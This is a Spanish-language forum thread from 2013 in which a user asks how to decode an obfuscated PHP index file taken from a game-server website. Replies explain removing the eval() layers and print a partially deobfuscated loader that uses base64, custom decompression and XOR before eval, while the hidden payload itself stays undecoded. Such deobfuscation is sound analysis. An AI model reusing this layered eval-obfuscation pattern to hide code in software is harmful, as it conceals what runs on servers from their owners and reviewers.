Decodificar

Iniciado por giancarlos19, 13 Marzo 2013, 04:21 AM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

giancarlos19

13 Marzo 2013, 04:21 AM Ultima modificación: 13 Marzo 2013, 04:26 AM por giancarlos19
Aver quien me ayuda a decodificar este index que esta en base64 pero ami parecer esta ofuscado mas de 1 vez.

Código [Seleccionar]
<?php
$o="QABIOzh3b3cKDSgoAAAeLSgoA0EnKjkAGCd/TWZjYn8nUGJlAAAQJwNHV2hwAABidWJjJ2V+J0hqZnVKR3RzMABidQAAAycDJ1NiZmpXYnVyQW5paAAAJyEnQ0JfU1VIQEZKQlVUJwAwVGhhc3BmdWJ0DgAQAzdwcHApQPhtCcBqcilkaGoBsAAxAfMAAB4tA0FjYmEAAm5pYi8lVEJUVE5ISVhJB7AlAAArJyVjYTJGNTA+T0RCVVJ/AABkd0YlLjwKDQoNaGVYdHNmEAB1cy8A8XRidHRuaGlYaWZqYnAALwQZAdkC9woNbmEvbnR0YnMvIwAAWEBCU1wld3Jla25kJVouLgAOCg18Cg0OdHBuc2RvAe4BoAHhDgBCZGZ0YiclZGZ3AlBmJSc9AYAOAAF1YnZybnViWGhpZGIvJX8RgQCAf3BiZShka2YGoHQoRFNKWESsQAMjKQFCKSFwDNIODiMB2Cc6J2licHIAJwEoDjICWyo5BLRYTmpmYGIvNjQEEDcrJzUyDvEODmJ/bhFzDg5ldRQBYmZsEwAOCzRraGBoQHJua2MLX6/wC19iC1NLA0ULfwpRAfYLmAFGC7kBVio5VG84JWhwAPEB9AsfDQ56Cg0AMAoNFX9iFXIAOEZpc24qQWtoaEMUhgK/ArNUYnMGAXNuaWB0Ap8avGtoZmMpbmlkAp+CZAKSa2ZpYHIW4HQoAKUClgoNHDJTYgPAandrZnNiELgBNQ6yAlJAYmlidWZwHWsCSAEkAjdEdWhpTWhlAjgBJAI3VwiRBYEqOVViYydQZB8DCGwqOVNXS1gopofwA85GbWZ/BHIBrgkUAdcFrhwhA3I4OQ==";eval(base64_decode("JGxsbD0wO2V2YWwoYmFzZTY0X2RlY29kZSgiSkd4c2JHeHNiR3hzYkd4c1BTZGlZWE5sTmpSZlpHVmpiMlJsSnpzPSIpKTskbGw9MDtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd3OUoyOXlaQ2M3IikpOyRsbGxsPTA7JGxsbGxsPTM7ZXZhbCgkbGxsbGxsbGxsbGwoIkpHdzlKR3hzYkd4c2JHeHNiR3hzS0NSdktUcz0iKSk7JGxsbGxsbGw9MDskbGxsbGxsPSgkbGxsbGxsbGxsbCgkbFsxXSk8PDgpKyRsbGxsbGxsbGxsKCRsWzJdKTtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd4c2JHdzlKM04wY214bGJpYzciKSk7JGxsbGxsbGxsbD0xNjskbGxsbGxsbGw9IiI7Zm9yKDskbGxsbGw8JGxsbGxsbGxsbGxsbGwoJGwpOyl7aWYoJGxsbGxsbGxsbD09MCl7JGxsbGxsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8OCk7JGxsbGxsbCs9JGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTskbGxsbGxsbGxsPTE2O31pZigkbGxsbGxsJjB4ODAwMCl7JGxsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8NCk7JGxsbCs9KCRsbGxsbGxsbGxsKCRsWyRsbGxsbF0pPj40KTtpZigkbGxsKXskbGw9KCRsbGxsbGxsbGxsKCRsWyRsbGxsbCsrXSkmMHgwZikrMztmb3IoJGxsbGw9MDskbGxsbDwkbGw7JGxsbGwrKykkbGxsbGxsbGxbJGxsbGxsbGwrJGxsbGxdPSRsbGxsbGxsbFskbGxsbGxsbC0kbGxsKyRsbGxsXTskbGxsbGxsbCs9JGxsO31lbHNleyRsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8OCk7JGxsKz0kbGxsbGxsbGxsbCgkbFskbGxsbGwrK10pKzE2O2ZvcigkbGxsbD0wOyRsbGxsPCRsbDskbGxsbGxsbGxbJGxsbGxsbGwrJGxsbGwrK109JGxsbGxsbGxsbGwoJGxbJGxsbGxsXSkpOyRsbGxsbCsrOyRsbGxsbGxsKz0kbGw7fX1lbHNlJGxsbGxsbGxsWyRsbGxsbGxsKytdPSRsbGxsbGxsbGxsKCRsWyRsbGxsbCsrXSk7JGxsbGxsbDw8PTE7JGxsbGxsbGxsbC0tO31ldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd4c2JEMG5ZMmh5SnpzPSIpKTskbGxsbGw9MDtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkQwaVB5SXVKR3hzYkd4c2JHeHNiR3hzYkNnMk1pazciKSk7JGxsbGxsbGxsbGw9IiI7Zm9yKDskbGxsbGw8JGxsbGxsbGw7KXskbGxsbGxsbGxsbC49JGxsbGxsbGxsbGxsbCgkbGxsbGxsbGxbJGxsbGxsKytdXjB4MDcpO31ldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkM0OUpHeHNiR3hzYkd4c2JHd3VKR3hzYkd4c2JHeHNiR3hzYkNnMk1Da3VJajhpT3c9PSIpKTtldmFsKCRsbGxsbGxsbGwpOw=="));return;?>

de ante mano muchas gracias.

giancarlos19

#1
13 Marzo 2013, 20:39 PM
Nadies sabe como decodificar ?? :S

Shell Root

#2
14 Marzo 2013, 05:18 AM
Sólo tienes ese pedazo de código? Muestralo todo!
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

it3r

#3
14 Marzo 2013, 15:05 PM
pues si como dices esta ofuscado mas de una vez y la verdad es mucho trabajo el tratar de volverlo a texto claro, a menos de que fuera indispensable, me evitaria el cansancio xD.

Pero de todas maneras tienes que ir quitando los eval() y decodificar el codigo que esta en base64.

Como ejemplo, cambiando el eval por un echo del base64_decode, queda así:

Código (php) [Seleccionar]

$lll=0;eval(base64_decode("JGxsbGxsbGxsbGxsPSdiYXNlNjRfZGVjb2RlJzs="));$ll=0;eval($lllllllllll("JGxsbGxsbGxsbGw9J29yZCc7"));$llll=0;$lllll=3;eval($lllllllllll("JGw9JGxsbGxsbGxsbGxsKCRvKTs="));$lllllll=0;$llllll=($llllllllll($l[1])<<8)+$llllllllll($l[2]);eval($lllllllllll("JGxsbGxsbGxsbGxsbGw9J3N0cmxlbic7"));$lllllllll=16;$llllllll="";for(;$lllll<$lllllllllllll($l);){if($lllllllll==0){$llllll=($llllllllll($l[$lllll++])<<8);$llllll+=$llllllllll($l[$lllll++]);$lllllllll=16;}if($llllll&0x8000){$lll=($llllllllll($l[$lllll++])<<4);$lll+=($llllllllll($l[$lllll])>>4);if($lll){$ll=($llllllllll($l[$lllll++])&0x0f)+3;for($llll=0;$llll<$ll;$llll++)$llllllll[$lllllll+$llll]=$llllllll[$lllllll-$lll+$llll];$lllllll+=$ll;}else{$ll=($llllllllll($l[$lllll++])<<8);$ll+=$llllllllll($l[$lllll++])+16;for($llll=0;$llll<$ll;$llllllll[$lllllll+$llll++]=$llllllllll($l[$lllll]));$lllll++;$lllllll+=$ll;}}else$llllllll[$lllllll++]=$llllllllll($l[$lllll++]);$llllll<<=1;$lllllllll--;}eval($lllllllllll("JGxsbGxsbGxsbGxsbD0nY2hyJzs="));$lllll=0;eval($lllllllllll("JGxsbGxsbGxsbD0iPyIuJGxsbGxsbGxsbGxsbCg2Mik7"));$llllllllll="";for(;$lllll<$lllllll;){$llllllllll.=$llllllllllll($llllllll[$lllll++]^0x07);}eval($lllllllllll("JGxsbGxsbGxsbC49JGxsbGxsbGxsbGwuJGxsbGxsbGxsbGxsbCg2MCkuIj8iOw=="));eval($lllllllll);


Igual no parece un archivo muy grande así que si dale no mas :)

Saludos.

Shell Root

#4
14 Marzo 2013, 21:58 PM
De donde sacaste el código?

Código (php) [Seleccionar]
<?php
    $lll 0;
    # eval(base64_decode("JGxsbGxsbGxsbGxsPSdiYXNlNjRfZGVjb2RlJzs="));
    $lllllllllll='base64_decode';
    $ll 0;
    #eval($lllllllllll("JGxsbGxsbGxsbGw9J29yZCc7"));
    $llllllllll='ord';
    $llll  0;
    $lllll 3;
    #eval($lllllllllll("JGw9JGxsbGxsbGxsbGxsKCRvKTs="));
    $l=$lllllllllll($o);
    $lllllll 0;
    $llllll  = ($llllllllll($l[1]) << 8) + $llllllllll($l[2]);
    #eval($lllllllllll("JGxsbGxsbGxsbGxsbGw9J3N0cmxlbic7"));
    $lllllllllllll='strlen';
    $lllllllll 16;
    $llllllll  "";
    for (; $lllll $lllllllllllll($l);) {
        if ($lllllllll == 0) {
            $llllll = ($llllllllll($l[$lllll++]) << 8);
            $llllll += $llllllllll($l[$lllll++]);
            $lllllllll 16;
        }
        if ($llllll 0x8000) {
            $lll = ($llllllllll($l[$lllll++]) << 4);
            $lll += ($llllllllll($l[$lllll]) >> 4);
            if ($lll) {
                $ll = ($llllllllll($l[$lllll++]) & 0x0f) + 3;
                for ($llll 0$llll $ll$llll++)
                    $llllllll[$lllllll $llll] = $llllllll[$lllllll $lll $llll];
                $lllllll += $ll;
            } else {
                $ll = ($llllllllll($l[$lllll++]) << 8);
                $ll += $llllllllll($l[$lllll++]) + 16;
                for ($llll 0$llll $ll$llllllll[$lllllll $llll++] = $llllllllll($l[$lllll]));
                $lllll++;
                $lllllll += $ll;
            }
        } else
            $llllllll[$lllllll++] = $llllllllll($l[$lllll++]);
        $llllll <<= 1;
        $lllllllll--;
    }
    #eval($lllllllllll("JGxsbGxsbGxsbGxsbD0nY2hyJzs="));
    $llllllllllll='chr';
    $lllll 0;
    #eval($lllllllllll("JGxsbGxsbGxsbD0iPyIuJGxsbGxsbGxsbGxsbCg2Mik7"));
    $lllllllll="?".$llllllllllll(62);
    $llllllllll "";
    for (; $lllll $lllllll;) {
        $llllllllll .= $llllllllllll($llllllll[$lllll++] ^ 0x07);
    }
    #eval($lllllllllll("JGxsbGxsbGxsbC49JGxsbGxsbGxsbGwuJGxsbGxsbGxsbGxsbCg2MCkuIj8iOw=="));
    $lllllllll.=$llllllllll.$llllllllllll(60)."?";
    eval($lllllllll);
?>
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

giancarlos19

#5
17 Marzo 2013, 06:35 AM
Es una web de un servidor de juegos..
http://mu-meteor.com/
Imprimir
Ir Arriba Páginas1
Acciones del Usuario